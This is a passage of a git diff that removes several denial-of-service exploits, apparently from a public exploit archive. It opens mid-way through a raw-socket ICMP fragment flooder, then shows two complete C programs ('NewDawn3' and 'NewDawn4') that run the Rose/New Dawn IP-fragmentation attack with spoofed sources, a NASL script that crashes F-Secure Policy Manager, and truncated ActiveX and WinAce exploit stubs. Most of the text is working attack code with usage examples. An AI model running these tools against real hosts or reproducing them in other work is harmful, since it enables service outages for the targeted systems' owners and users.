inet_addr(buf); - -} - -unsigned short in_cksum(unsigned short *buh, int len) -{ - register long sum = 0; - unsigned short oddbyte; - register unsigned short answer; - - while(len > 1) { - sum += *buh++; - len -= 2; - } - - if(len == 1) { - oddbyte = 0; - *((unsigned char *)&oddbyte) = *(unsigned char *)buh; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xFFFF); - sum += (sum >> 16); - answer = ~sum; - return answer; -} - -int rose(struct sockaddr_in *victim, unsigned long src) -{ - int SMALLICMP = 1000; - unsigned char *pkt; - struct iphdr *ip; - struct igmphdr *igmp; - struct icmphdr *icmp_pkt; - struct utsname *un; - struct passwd *p; - - int i, s,j; - int id = (random() % 40000) + 500; - - pkt = (unsigned char *)calloc(1, SMALLICMP); - ip = (struct iphdr *)pkt; - icmp_pkt = (struct icmphdr *)(pkt + sizeof(struct iphdr)); - ip->version = 4; - ip->ihl = (sizeof *ip) / 4; - ip->ttl = 255; - ip->tot_len = htons(SMALLICMP); - ip->protocol = 1; - ip->id = htons(id); - ip->frag_off = htons(IP_MF); - ip->saddr = src; - ip->daddr = victim->sin_addr.s_addr; - ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); - - icmp_pkt->type = ICMP_ECHO; - icmp_pkt->code = 0; - icmp_pkt->checksum = 1000; - icmp_pkt->un.echo.id = random() % 255; - icmp_pkt->un.echo.sequence = random() % 255; - - for(i = sizeof(struct iphdr) + sizeof(struct icmphdr) + 1; - i < SMALLICMP; i++){ - //pkt[i] = random() % 255; - pkt[i] = '\x00'; - } - j=0; - for (i=sizeof(struct iphdr) + sizeof(struct icmphdr) + 500; - i < sizeof(struct iphdr) + sizeof(struct icmphdr) + 500 + 356; - i++){ - pkt[i] = code[j]; - j++; - } - if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { - perror("error: socket()"); - return 1; - } - - if(sendto(s, pkt, SMALLICMP, 0, (struct sockaddr *)victim, - sizeof(struct sockaddr_in)) == -1) { - perror("error: sendto()"); - return 1; - } - - /* big frag at end... */ - - ip->frag_off = htons(8100); - //ip->frag_off = htons(8100 | IP_MF); - sendto(s, pkt, SMALLICMP, 0, (struct sockaddr *)victim, - sizeof(struct sockaddr_in)); - - free(pkt); - close(s); - usleep(1000); - return 0; -} - -int main(int argc, char *argv[]) -{ - struct sockaddr_in victim; - struct hostent *he; - unsigned long source; - int i; - - srandom(time(NULL)); - - if(argc < 2) - usage(argv[0]); - - if((he = gethostbyname(argv[1])) == NULL) { - herror(argv[1]); - exit(1); - } - - if (argc > 2){ - source = inet_addr(argv[2]); - } - else { - source = randip(); - } - - memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length); - victim.sin_port = htons(0); - victim.sin_family = PF_INET; - - printf("Sending ICMP fragments: "); - fflush(stdout); - for(i = 0; i < NUM_PACKETS; i++) - { - rose(&victim, source); - if (argc < 3){ - source = randip(); - } - printf("%d\n", i); - fflush(stdout); - } - printf("\nDONE\n"); - fflush(stdout); -} - - diff --git a/platforms/windows/remote/24636.c b/platforms/windows/remote/24636.c deleted file mode 100755 index 3ef793cf3..000000000 --- a/platforms/windows/remote/24636.c +++ /dev/null @@ -1,378 +0,0 @@ -source: http://www.securityfocus.com/bid/11258/info - -Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. - -The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets. - -The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack". - -A remote attacker may exploit this vulnerability to deny service to an affected computer. - -Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected. - - -/*-------------------------------------------------------------*/ -/* - Implementation of Rose Attack described by Gandalf gandalf at digital.net - Reference: Bugtraq, 30 mars 2004, "IPv4 fragmentation, The Rose Attack" - - NewDawn3.c written by Ken Hollis based on the code rose.c - written by Laurent Constantin and rose2.c written by chuck - modified from large IGMP attack by Kox by Coolio (coolio (at) k-r4d.com) - - Program allows choice of TCP or UDP, number of packets to fragment, number - of fragments per packet and number of times the last fragment is - rewritten. - - Based on a conversation where it was mentioned that a highly fragmented - packet would cause high CPU utilization if the last fragment was written - over and over again. As chuck says, death by a thousand cuts. - - NewDawn3 send 32 byte fragments. See: - http://digital.net/~gandalf/Rose_Frag_Attack_Explained.htm - - Usage : ./NewDawn3 type(1or2) ipaddress [port] [NumP] [Numt] [NumR] [NumF] [NumD] - Example: ./NewDawn3 1 1.2.3.4 80 5 9999 99999999 4080 2 - type : 1=tcp, 2=udp - ipaddress : address to test - port : optional port number (0 means random) - NumP : Number of packets to fragment (less than 1000) - NumT : Number of times last fragment is rewritten - NumR : Number of times to run test - NumF : Number of fragments per packet - NumD : Delta between fragements. 8 = 32 bytes blank - 64 bytes total between fragments (32 bytes - payload + 32 bytes blank = 64 bytes), - 5 = 8 bytes blank (32 bytes payload + 8 bytes - blank = 40 bytes total = 5 * 8). - < 5 = overlapping fragments - - - Library netwib must be installed: - http://www.laurentconstantin.com/en/netw/netwib/ - http://go.to/laurentconstantin - - To compile and run : - gcc -Wall -o NewDawn3 NewDawn3.c `netwib-config -lc` - ./NewDawn3 1 www.example.com 80 - - The command: - ./NewDawn3 1 10.12.14.16 - Is equivalent to: - ./NewDawn3 1 10.12.14.16 0 5 9999 99999999 1021 8 - Where: - ./NewDawn3 = Program Name - 1 = TCP - 10.12.14.16 = IP Address - 0 = Random port numbers - 5 = Five packets to fragment before staring next set of packets - 9999 = The number of times to rewrite the last fragment of - the five packets - 99999999 = The number of times to run this entire attack - 1021 = The number of middle fragments to write. - 8 = 64 bytes between 32 byte fragments (8 bytes * 8 = 64) - - This was successfully tested with netwib 5.12.0, under Linux - to test a Windows 2000 host. Local network is Ethernet. -*/ - -/*-------------------------------------------------------------*/ -// Test large number of packets -#define NUM_PACKETS 1000 -#define NUM_LAST 9999 -#define NUM_RUN 99999999 -#define NUM_FRAG 8170 -#define NUM_DELTA 8 - -#include -#include -#include - -/*-------------------------------------------------------------*/ -typedef enum { - ROSE_TYPE_TCP = 1, - ROSE_TYPE_UDP = 2 -} rose_type; - -/*-------------------------------------------------------------*/ -typedef struct { - rose_type type; - netwib_ip ipad; - netwib_port port; - netwib_bool display; - netwib_buf buf; - netwib_io *pio; -} rose_params; - -/*-------------------------------------------------------------*/ -static netwib_err rose_loop(rose_params *prp, int npack, int nrew, - int nrun, int nfrag, int ndelta) -{ - netwib_iphdr ipheader, ipstore[NUM_PACKETS]; - netwib_tcphdr tcpheader, tcpstore[NUM_PACKETS]; - netwib_udphdr udpheader, udpstore[NUM_PACKETS]; - netwib_buf payload; - netwib_uint32 numsent = 0; - int i, j, nrun2; - -printf("Packets %d Rewrite %d Runs %d Fragment packet to byte %d Delta %d\n\r", - npack, nrew, nrun, nfrag, ndelta); - - for (nrun2=0; nrun2type) { - case ROSE_TYPE_TCP : - netwib_er(netwib_tcphdr_initdefault(&tcpstore[i])); - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &tcpstore[i].src)); - if (prp->port == 0) { - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &tcpstore[i].dst)); - } else { - tcpstore[i].dst = prp->port; - } - break; - case ROSE_TYPE_UDP : - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &udpstore[i].src)); - if (prp->port == 0) { - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &udpstore[i].dst)); - } else { - udpstore[i].dst = prp->port; - } - break; - } - } - - for (i=0; ibuf); - ipheader = ipstore[i]; - ipheader.header.ip4.morefrag = NETWIB_TRUE; - ipheader.header.ip4.offsetfrag = 0; /* not necessary, but to be clear */ - ipheader.src.iptype = NETWIB_IPTYPE_IP4; - ipheader.src.ipvalue.ip4 = ipstore[i].src.ipvalue.ip4; - ipheader.dst = prp->ipad; - switch(prp->type) { - case ROSE_TYPE_TCP : - tcpheader = tcpstore[i]; - tcpheader.src = tcpstore[i].src; - tcpheader.dst = tcpstore[i].dst; - tcpheader.ack = NETWIB_TRUE; - netwib_er(netwib_buf_init_ext_text("1234567890123456789012345678", - &payload)); - netwib_er(netwib_pkt_append_iptcpdata(&ipheader, &tcpheader, &payload, - &prp->buf)); - break; - case ROSE_TYPE_UDP : - netwib_er(netwib_udphdr_initdefault(&udpheader)); - udpheader.src = udpstore[i].src; - udpheader.dst = udpstore[i].dst; - netwib_er(netwib_buf_init_ext_text("12345678901234567890123456789012", - &payload)); - netwib_er(netwib_pkt_append_ipudpdata(&ipheader, &udpheader, &payload, - &prp->buf)); - break; - } - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - - /* construct middle fragments */ - netwib__buf_reinit(&prp->buf); - ipheader.header.ip4.offsetfrag = 0x0008; - for(ipheader.header.ip4.offsetfrag = 0x0008 ; - ipheader.header.ip4.offsetfrag< nfrag; - ipheader.header.ip4.offsetfrag = ipheader.header.ip4.offsetfrag + - ndelta){ - netwib__buf_reinit(&prp->buf); - switch(prp->type) { - case ROSE_TYPE_TCP : - ipheader.protocol = NETWIB_IPPROTO_TCP; - break; - case ROSE_TYPE_UDP : - ipheader.protocol = NETWIB_IPPROTO_UDP; - break; - } - netwib_er(netwib_buf_init_ext_text("12345678901234567890123456789012", - &payload)); - netwib_er(netwib_pkt_append_ipdata(&ipheader, &payload, &prp->buf)); - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - } - - } - - printf("Rewriting %d packets last fragment %d times\r\n", - npack,nrew); fflush(stdout); - - /* construct last fragment and rewrite NUM_LAST times */ - for (j=0;jbuf); - for (i=0; iipad; - switch(prp->type) { - case ROSE_TYPE_TCP : - tcpheader = tcpstore[i]; - tcpheader.src = tcpstore[i].src; - tcpheader.dst = tcpstore[i].dst; - tcpheader.ack = NETWIB_TRUE; - ipheader.protocol = NETWIB_IPPROTO_TCP; - break; - case ROSE_TYPE_UDP : - udpheader.src = udpstore[i].src; - udpheader.dst = udpstore[i].dst; - ipheader.protocol = NETWIB_IPPROTO_UDP; - break; - } - - netwib__buf_reinit(&prp->buf); - ipheader.header.ip4.morefrag = NETWIB_FALSE; - ipheader.header.ip4.offsetfrag = 0x1FF0; - netwib_er(netwib_buf_init_ext_text("12345678901234567890123456789012", - &payload)); - netwib_er(netwib_pkt_append_ipdata(&ipheader, &payload, &prp->buf)); - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - } - } - /* dot display */ - if (!prp->display && (numsent%100)==0) { - printf("."); fflush(stdout); - } - numsent++; - } - - return(NETWIB_ERR_OK); -} - -/*-------------------------------------------------------------*/ -int main(int argc, char* argv[]) -{ - rose_params rp; - netwib_buf ipstr; - netwib_err ret; - int npack, nrew, nrun, nfrag, ndelta; - - /* initialize netwib */ - netwib_init(); - - /* check parameter count */ - if (argc < 3 || argc > 9) { - printf("Usage : %s type(1or2) ipaddress [port] [NumP] [Numt] [NumR] [NumF] [NumD]\n", argv[0]); - printf("Example: %s 1 1.2.3.4 80 5 9999 99999999 1021 8\n", argv[0]); - printf(" type : %d=tcp, %d=udp\n", ROSE_TYPE_TCP, ROSE_TYPE_UDP); - printf(" ipaddress : address to test\n"); - printf(" port : optional port number (0 means random)\n"); - printf(" NumP : Number of packets to fragment\n"); - printf(" NumT : Number of times last fragment is rewritten\n"); - printf(" NumR : Number of times to run test\n"); - printf(" NumF : Number of fragments per packet\n"); - printf(" NumD : Delta between fragements.\n"); - return(1); - } - - /* first parameter is type */ - rp.type = atoi(argv[1]); - switch(rp.type) { - case ROSE_TYPE_TCP : - case ROSE_TYPE_UDP : - break; - default : - printf("First parameter must be 1 or 2 (currently=%s)\n", argv[1]); - return(2); - } - - /* second parameter is IP address */ - netwib_er(netwib_buf_init_ext_text(argv[2], &ipstr)); - ret = netwib_ip_init_buf(&ipstr, NETWIB_IP_DECODETYPE_BEST, &rp.ipad); - if (ret != NETWIB_ERR_OK) { - printf("Second parameter must be an IP or hostname (currently=%s)\n", - argv[2]); - return(3); - } - - /* third parameter is port number */ - rp.port = 0; - if (argc > 3) { - rp.port = atoi(argv[3]); /* on error, set to 0, but that's ok */ - } - - /* fourth parameter is number of packets to fragment */ - npack = 5; - if (argc > 4) { - npack = atoi(argv[4]); /* on error, set to 1 */ - } - if (npack < 1) { npack = 1; } - if (npack > 1000) { npack = 1000; } - - /* fifth parameter is number of times packet is rewritten */ - nrew = NUM_LAST; - if (argc > 5) { - nrew = atoi(argv[5]); /* on error, set to 0, but that's ok */ - } - - /* sixth parameter is number of times to run the test */ - nrun = NUM_RUN; - if (argc > 6) { - nrun = atoi(argv[6]); /* on error, set to 0, but that's ok */ - } - - /* seventh parameter is number of fragments per packet */ - nfrag = NUM_FRAG; - if (argc > 7) { - nfrag = atoi(argv[7]); - } - if (nfrag < 1) { nfrag = 1; } - - /* eighth parameter is delta between fragments */ - ndelta = NUM_DELTA; - if (argc > 8) { - ndelta = atoi(argv[8]); - } - - /* Make sure that the fragments do not exceed 8170 */ - - nfrag = (nfrag * ndelta) + 8; - if (nfrag > 8170) { nfrag = 8170; } - - printf("%s %d %s %d %d %d %d %d ndelta = %d\n\r", - argv[0], rp.type, argv[2], rp.port, npack, nrew, nrun, - nfrag / 8, ndelta); - - /* set to NETWIB_TRUE to activate display */ - rp.display = NETWIB_FALSE; - - /* instead of allocating memory each time, just use this permanent buffer */ - netwib_er(netwib_buf_init_mallocdefault(&rp.buf)); - - /* initialize spoofing feature */ - netwib_er(netwib_io_init_spoof_ip(NETWIB_SPOOF_IP_INITTYPE_LINKBRAW, - &rp.pio)); - - /* main function */ - ret = rose_loop(&rp, npack, nrew, nrun, nfrag, ndelta); - if (ret != NETWIB_ERR_OK) { - netwib_er(netwib_err_display(ret, NETWIB_ERR_ENCODETYPE_FULL)); - return(ret); - } - - /* close netwib */ - netwib_er(netwib_io_close(&rp.pio)); - netwib_er(netwib_buf_close(&rp.buf)); - netwib_close(); - - return(0); -} - diff --git a/platforms/windows/remote/24637.c b/platforms/windows/remote/24637.c deleted file mode 100755 index e806724ff..000000000 --- a/platforms/windows/remote/24637.c +++ /dev/null @@ -1,379 +0,0 @@ -source: http://www.securityfocus.com/bid/11258/info - -Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. - -The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets. - -The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack". - -A remote attacker may exploit this vulnerability to deny service to an affected computer. - -Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected. - -/*-------------------------------------------------------------*/ -/* - Implementation of Rose Attack described by Gandalf gandalf at digital.net - Reference: Bugtraq, 30 mars 2004, "IPv4 fragmentation, The Rose Attack" - - NewDawn4.c written by Ken Hollis based on the code rose.c - written by Laurent Constantin and NewDawn.c and NewDawn2.c - written by chuck modified from large IGMP attack by Kox by - Coolio (coolio (at) k-r4d.com) - - Program allows choice of TCP or UDP, number of packets to fragment, number - of fragments per packet and number of times the last fragment is - rewritten. - - Based on a conversation where it was mentioned that a highly fragmented - packet would cause high CPU utilization if the last fragment was written - over and over again. - - As chuck says, death by a thousand cuts. - - NewDawn4 allows smaller fragments (8 bytes) to be sent to the host. See: - http://digital.net/~gandalf/Rose_Frag_Attack_Explained.htm - - Usage : ./NewDawn4 type(1or2) ipaddress [port] [NumP] [Numt] [NumR] [NumF] [NumD] - Example: ./NewDawn4 1 1.2.3.4 80 5 9999 99999999 4080 2 - type : 1=tcp, 2=udp - ipaddress : address to test - port : optional port number (0 means random) - NumP : Number of packets to fragment (less than 1000) - NumT : Number of times last fragment is rewritten - NumR : Number of times to run test - NumF : Number of fragments per packet - NumD : Delta between fragements. 2 = 8 bytes blank - 16 bytes total between fragments (8 bytes - payload + 8 bytes blank = 16 bytes), - 5 = 32 bytes blank (8 bytes payload + 32 bytes - blank = 40 bytes total = 5 * 8). - - Library netwib must be installed: - http://www.laurentconstantin.com/en/netw/netwib/ - http://go.to/laurentconstantin - - To compile and run : - gcc -Wall -o NewDawn4 NewDawn4.c `netwib-config -lc` - ./NewDawn4 1 www.example.com 80 - - The command: - ./NewDawn4 1 10.12.14.16 - Is equivalent to: - ./NewDawn4 1 10.12.14.16 0 5 9999 99999999 1021 8 - Where: - ./NewDawn4 = Program Name - 1 = TCP - 10.12.14.16 = IP Address - 0 = Random port numbers - 5 = Five packets to fragment before staring next set of packets - 9999 = The number of times to rewrite the last fragment of - the five packets - 99999999 = The number of times to run this entire attack - 1021 = The number of middle fragments to write. - 8 = 64 bytes, 8 byte data + 56 bytes blank fragments (8 bytes * 8 = 64) - - This was successfully tested with netwib 5.12.0, under Linux - to test a Windows 2000 host. Local network is Ethernet. -*/ - -/*-------------------------------------------------------------*/ -// Test large number of packets -#define NUM_PACKETS 1000 -#define NUM_LAST 9999 -#define NUM_RUN 99999999 -#define NUM_FRAG 8170 -#define NUM_DELTA 8 - -#include -#include -#include - -/*-------------------------------------------------------------*/ -typedef enum { - ROSE_TYPE_TCP = 1, - ROSE_TYPE_UDP = 2 -} rose_type; - -/*-------------------------------------------------------------*/ -typedef struct { - rose_type type; - netwib_ip ipad; - netwib_port port; - netwib_bool display; - netwib_buf buf; - netwib_io *pio; -} rose_params; - -/*-------------------------------------------------------------*/ -static netwib_err rose_loop(rose_params *prp, int npack, int nrew, - int nrun, int nfrag, int ndelta) -{ - netwib_iphdr ipheader, ipstore[NUM_PACKETS]; - netwib_tcphdr tcpheader, tcpstore[NUM_PACKETS]; - netwib_udphdr udpheader, udpstore[NUM_PACKETS]; - netwib_buf payload; - netwib_uint32 numsent = 0; - int i, j, nrun2; - -printf("Packets %d Rewrite %d Runs %d Fragment packet to byte %d Delta %d\n\r", - npack, nrew, nrun, nfrag, ndelta); - - for (nrun2=0; nrun2type) { - case ROSE_TYPE_TCP : - netwib_er(netwib_tcphdr_initdefault(&tcpstore[i])); - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &tcpstore[i].src)); - if (prp->port == 0) { - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &tcpstore[i].dst)); - } else { - tcpstore[i].dst = prp->port; - } - break; - case ROSE_TYPE_UDP : - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &udpstore[i].src)); - if (prp->port == 0) { - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &udpstore[i].dst)); - } else { - udpstore[i].dst = prp->port; - } - break; - } - } - - for (i=0; ibuf); - ipheader = ipstore[i]; - ipheader.header.ip4.morefrag = NETWIB_TRUE; - ipheader.header.ip4.offsetfrag = 0; /* not necessary, but to be clear */ - ipheader.src.iptype = NETWIB_IPTYPE_IP4; - ipheader.src.ipvalue.ip4 = ipstore[i].src.ipvalue.ip4; - ipheader.dst = prp->ipad; - switch(prp->type) { - case ROSE_TYPE_TCP : - tcpheader = tcpstore[i]; - tcpheader.src = tcpstore[i].src; - tcpheader.dst = tcpstore[i].dst; - tcpheader.ack = NETWIB_TRUE; - netwib_er(netwib_buf_init_ext_text("1234567890123456789012345678", - &payload)); - netwib_er(netwib_pkt_append_iptcpdata(&ipheader, &tcpheader, &payload, - &prp->buf)); - break; - case ROSE_TYPE_UDP : - netwib_er(netwib_udphdr_initdefault(&udpheader)); - udpheader.src = udpstore[i].src; - udpheader.dst = udpstore[i].dst; - netwib_er(netwib_buf_init_ext_text("12345678901234567890123456789012", - &payload)); - netwib_er(netwib_pkt_append_ipudpdata(&ipheader, &udpheader, &payload, - &prp->buf)); - break; - } - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - - /* construct middle fragments */ - ipheader.header.ip4.offsetfrag = 0x0008; - for(ipheader.header.ip4.offsetfrag = 0x0008 ; - ipheader.header.ip4.offsetfrag< nfrag; - ipheader.header.ip4.offsetfrag = ipheader.header.ip4.offsetfrag + - ndelta){ - netwib__buf_reinit(&prp->buf); - switch(prp->type) { - case ROSE_TYPE_TCP : - ipheader.protocol = NETWIB_IPPROTO_TCP; - netwib_er(netwib_buf_init_ext_text("12345678", - &payload)); - break; - case ROSE_TYPE_UDP : - ipheader.protocol = NETWIB_IPPROTO_UDP; - netwib_er(netwib_buf_init_ext_text("12345678", - &payload)); - break; - } - netwib_er(netwib_pkt_append_ipdata(&ipheader, &payload, &prp->buf)); - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - } - - } - - printf("Rewriting %d packets last fragment %d times\r\n", - npack,nrew); fflush(stdout); - - /* construct last fragment and rewrite NUM_LAST times */ - for (j=0;jbuf); - for (i=0; iipad; - switch(prp->type) { - case ROSE_TYPE_TCP : - tcpheader = tcpstore[i]; - tcpheader.src = tcpstore[i].src; - tcpheader.dst = tcpstore[i].dst; - tcpheader.ack = NETWIB_TRUE; - ipheader.protocol = NETWIB_IPPROTO_TCP; - break; - case ROSE_TYPE_UDP : - udpheader.src = udpstore[i].src; - udpheader.dst = udpstore[i].dst; - ipheader.protocol = NETWIB_IPPROTO_UDP; - break; - } - - netwib__buf_reinit(&prp->buf); - ipheader.header.ip4.morefrag = NETWIB_FALSE; - ipheader.header.ip4.offsetfrag = 0x1FF0; - netwib_er(netwib_buf_init_ext_text("1234567890123456", - &payload)); - netwib_er(netwib_pkt_append_ipdata(&ipheader, &payload, &prp->buf)); - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - } - } - /* dot display */ - if (!prp->display && (numsent%100)==0) { - printf("."); fflush(stdout); - } - numsent++; - } - - return(NETWIB_ERR_OK); -} - -/*-------------------------------------------------------------*/ -int main(int argc, char* argv[]) -{ - rose_params rp; - netwib_buf ipstr; - netwib_err ret; - int npack, nrew, nrun, nfrag, ndelta; - - /* initialize netwib */ - netwib_init(); - - /* check parameter count */ - if (argc < 3 || argc > 9) { - printf("Usage : %s type(1or2) ipaddress [port] [NumP] [Numt] [NumR] [NumF] [NumD]\n", argv[0]); - printf("Example: %s 1 1.2.3.4 80 5 9999 99999999 1021 8\n", argv[0]); - printf(" type : %d=tcp, %d=udp\n", ROSE_TYPE_TCP, ROSE_TYPE_UDP); - printf(" ipaddress : address to test\n"); - printf(" port : optional port number (0 means random)\n"); - printf(" NumP : Number of packets to fragment\n"); - printf(" NumT : Number of times last fragment is rewritten\n"); - printf(" NumR : Number of times to run test\n"); - printf(" NumF : Number of fragments per packet\n"); - printf(" NumD : Delta between fragements.\n"); - return(1); - } - - /* first parameter is type */ - rp.type = atoi(argv[1]); - switch(rp.type) { - case ROSE_TYPE_TCP : - case ROSE_TYPE_UDP : - break; - default : - printf("First parameter must be 1 or 2 (currently=%s)\n", argv[1]); - return(2); - } - - /* second parameter is IP address */ - netwib_er(netwib_buf_init_ext_text(argv[2], &ipstr)); - ret = netwib_ip_init_buf(&ipstr, NETWIB_IP_DECODETYPE_BEST, &rp.ipad); - if (ret != NETWIB_ERR_OK) { - printf("Second parameter must be an IP or hostname (currently=%s)\n", - argv[2]); - return(3); - } - - /* third parameter is port number */ - rp.port = 0; - if (argc > 3) { - rp.port = atoi(argv[3]); /* on error, set to 0, but that's ok */ - } - - /* fourth parameter is number of packets to fragment */ - npack = 5; - if (argc > 4) { - npack = atoi(argv[4]); /* on error, set to 1 */ - } - if (npack < 1) { npack = 1; } - if (npack > 1000) { npack = 1000; } - - /* fifth parameter is number of times packet is rewritten */ - nrew = NUM_LAST; - if (argc > 5) { - nrew = atoi(argv[5]); /* on error, set to 0, but that's ok */ - } - - /* sixth parameter is number of times to run the test */ - nrun = NUM_RUN; - if (argc > 6) { - nrun = atoi(argv[6]); /* on error, set to 0, but that's ok */ - } - - /* seventh parameter is number of fragments per packet */ - nfrag = NUM_FRAG; - if (argc > 7) { - nfrag = atoi(argv[7]); - } - if (nfrag < 1) { nfrag = 1; } - - /* eighth parameter is delta between fragments */ - ndelta = NUM_DELTA; - if (argc > 8) { - ndelta = atoi(argv[8]); - } - - /* Make sure that the fragments do not exceed 8170 */ - - nfrag = (nfrag * ndelta) + 8; - if (nfrag > 8170) { nfrag = 8170; } - - printf("%s %d %s %d %d %d %d %d ndelta = %d\n\r", - argv[0], rp.type, argv[2], rp.port, npack, nrew, nrun, - nfrag / 8, ndelta); - - /* set to NETWIB_TRUE to activate display */ - rp.display = NETWIB_FALSE; - - /* instead of allocating memory each time, just use this permanent buffer */ - netwib_er(netwib_buf_init_mallocdefault(&rp.buf)); - - /* initialize spoofing feature */ - netwib_er(netwib_io_init_spoof_ip(NETWIB_SPOOF_IP_INITTYPE_LINKBRAW, - &rp.pio)); - - /* main function */ - ret = rose_loop(&rp, npack, nrew, nrun, nfrag, ndelta); - if (ret != NETWIB_ERR_OK) { - netwib_er(netwib_err_display(ret, NETWIB_ERR_ENCODETYPE_FULL)); - return(ret); - } - - /* close netwib */ - netwib_er(netwib_io_close(&rp.pio)); - netwib_er(netwib_buf_close(&rp.buf)); - netwib_close(); - - return(0); -} - diff --git a/platforms/windows/remote/30104.nasl b/platforms/windows/remote/30104.nasl deleted file mode 100755 index d5bc21d40..000000000 --- a/platforms/windows/remote/30104.nasl +++ /dev/null @@ -1,76 +0,0 @@ -source: http://www.securityfocus.com/bid/24233/info - -F-Secure Policy Manager is prone to a remote denial-of-service vulnerability because the application fails to propelry handle unexpected conditions. - -Exploiting this issue allows remote attackers to crash affected applications, denying further service to legitimate users. The vendor states that this application is typically available only to internal networks, making remote exploits over the Internet less likely. - -Versions of F-Secure Policy Manager prior to 7.01 are vulnerable. - -# -# This script was written by David Maciejak -# - -if(description) -{ -script_id(50000); - -script_version("$Revision: 1.0 $"); -script_name(english:"F-Secure Policy Manager Server fsmsh.dll module DoS"); - -desc["english"] = " -Synopsis : - -The remote host is an F-Secure Policy Manager Server. - -Description : - -The remote host is running a version a F-Secure Policy Manager Server which -is vulnerable to a denial of service. -A malicious user can forged a request to query a MS-DOS device name through -fsmsh.dll CGI module causing the service to stop answer to legitimate users. - -Solution : - -Not available for now. - -Risk factor : - -High"; - -script_description(english:desc["english"]); -script_summary(english:"Detects F-Secure Policy Manager DoS flaw"); - - script_category(ACT_DENIAL); - script_copyright(english:"This script is Copyright (C) 2007 David Maciejak"); - script_family(english:"Denial of Service"); - script_require_ports("Services/www", 80); - exit(0); -} - -include("http_func.inc"); -include("http_keepalive.inc"); - -port = get_http_port(default:80); -if ( ! port ) exit(0); -if(!get_port_state(port))exit(0); - -if (safe_checks()) -{ - # only check FSMSH.DLL version - buf = http_get(item:"/fsms/fsmsh.dll?FSMSCommand=GetVersion", port:port); - r = http_keepalive_send_recv(port:port, data:buf, bodyonly:1); - if( r == NULL )exit(0); - #this could generate false positive on Linux platform - if ("7.00.7038" >< r ) { - security_hole(port); - } - exit(0); -} - -buf = http_get(item:"/fsms/fsmsh.dll?FSMSCommand=DownloadPackage&Type=25&Filename=\install\dbupdate\CON", port:port); -r = http_keepalive_send_recv(port:port, data:buf, bodyonly:1); -buf = http_get(item:"/fsms/fsmsh.dll?FSMSCommand=GetVersion", port:port); -r = http_keepalive_send_recv(port:port, data:buf, bodyonly:1); -if( r == NULL ) { - security_hole(port); -} diff --git a/platforms/windows/remote/30756.html b/platforms/windows/remote/30756.html deleted file mode 100755 index 0e36fb3c1..000000000 --- a/platforms/windows/remote/30756.html +++ /dev/null @@ -1,49 +0,0 @@ -source: http://www.securityfocus.com/bid/26414/info - -Microsoft Forms 2.0 ActiveX Control is prone to multiple memory-access violation denial-of-service vulnerabilities. - -Attackers can exploit these issues to crash Internet Explorer and deny service to legitimate users. - -Note: Forms 2.0 ActiveX is distributed with any application that includes Visual Basic for Applications 5.0. - - - - - - - - \ No newline at end of file diff --git a/platforms/windows/remote/32688.py b/platforms/windows/remote/32688.py deleted file mode 100755 index 4d8a38594..000000000 --- a/platforms/windows/remote/32688.py +++ /dev/null @@ -1,66 +0,0 @@ -source: http://www.securityfocus.com/bid/33049/info - -Winace is prone to a denial-of-service vulnerability. - -Attackers can exploit this issue to crash Windows Explorer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. - -Winace 2.2 is vulnerable; other versions may also be affected. - -#!/usr/bin/python -##################################### -# Author : -cN4phux -# -# Mail : cN4phux[at]Gmail[dot]com # Proud to be Algerian; # -# Site : N/A (not -yet) # -##################################### -#Greetz to all DZ's : Blub , Knuthy , His0k4 , Djug , Izem , etc . . . -# : Zigma , Heurs etc . . . - -# MS Windows Explorer Unspecified ( WinAce 2.2 ) Denial of Service Exploit -# Magic offset : -# Bug comes from shell32.dll -# EventType : BEX P1 : explorer.exe P2 : 6.0.2900.2180 P3 -: 41107ece -# P4 : shell32.dll P5 : 6.0.2900.2180 P6 : 4125330f P7 : -000e1666 -# P8 : c0000409 P9 : 00000000 -# Just right click the file and move your mouse to( Add to 